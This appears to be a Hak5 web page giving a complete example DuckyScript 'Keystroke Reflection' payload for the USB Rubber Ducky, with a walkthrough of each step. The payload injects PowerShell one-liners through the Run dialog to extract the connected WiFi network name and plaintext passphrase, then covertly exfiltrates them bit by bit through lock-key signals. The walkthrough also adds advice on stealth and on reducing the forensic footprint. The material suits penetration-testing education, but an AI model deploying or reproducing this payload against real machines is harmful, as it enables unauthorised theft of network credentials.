Menu
0
    0

    Your Cart is Empty

    Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning podcasts, leading pentest gear, and inclusive community – where all hackers belong.

    PAYLOAD HUB
    Discover creative payloads from the Hak5 community with filtering by device and category.

    PAYLOAD STUDIO
    Unleash your hacking creativity with this full-featured web-based Payload development environment.

    PAYLOAD AWARDS
    Get your payload in front of thousands and enter to win. Nearly $10,000 in annual Hak5 prizes!

    ADVANCED DUCKYSCRIPT COURSE
    Learn directly from the creators! Unlock your creative potential with this comprehensive online course.

    [PAYLOAD] SERIES
    Join Hak5 hosts and collaborators as we dive into the techniques and code that make great payloads!

    Community developed payloads for Hak5 gear are featured and awarded at PayloadHub — a growing library of currated content.

    Unleash your hacking creativity with the online payload editor: PayloadStudio

    Link to your collections, sales and even external links

    Add up to five columns

    Keystroke Reflection Example DuckyScript

    REM Example Simple Keystroke Reflection Attack for Windows
REM Saves currently connected wireless LAN profile to DUCKY
ATTACKMODE HID
LED_OFF
DELAY 2000
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE

REM Store the currently connected WiFi SSID & Key to %tmp%\z
GUI r
DELAY 100
STRINGLN powershell "netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\z"
DELAY 100

REM Convert the stored creds into CAPSLOCK and NUMLOCK values.
GUI r
DELAY 100
STRINGLN powershell "foreach($b in $(cat $env:tmp\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\z"
DELAY 100

REM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky.
GUI r
DELAY 100
STRINGLN powershell "$o=(cat $env:tmp\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\z"
DELAY 100

REM The final SCROLLLOCK keystroke indicates EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE

     

    Per the initial ATTACKMODE command. the USB Rubber Ducky will act as a HID keyboard.

    SAVE_HOST_KEYBOARD_LOCK_STATE will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.

    $_EXFIL_MODE_ENABLED = TRUE will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within loot.bin.

    $_EXFIL_LEDS_ENABLED = TRUE will show flash the USB Rubber Ducky LED as loot is saved, useful when debugging. Set as FALSE for a more stealthy operation, however the flash drive case should sufficiently conceal the LED.

    The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the "loot", is saved as "z" within %TEMP% ($env:tmp\z) directory, encoded in standard ASCII.

    The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.

    The third and final powershell one-liner, in software, will "press" the lock keys indicated by the temporary file via the SendKeys .NET class. The effect of this will be the binary values of the converted loot sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.

    Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.

    WAIT_FOR_SCROLL_CHANGE will get triggered when the final key "press" from the SendKeys class is executed, thereby continuing the payload.

    Finally $_EXFIL_MODE_ENABLED = FALSE will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin and RESTORE_HOST_KEYBOARD_LOCK_STATE will restore the lock key LEDs to their original state before the exfiltration began.



    x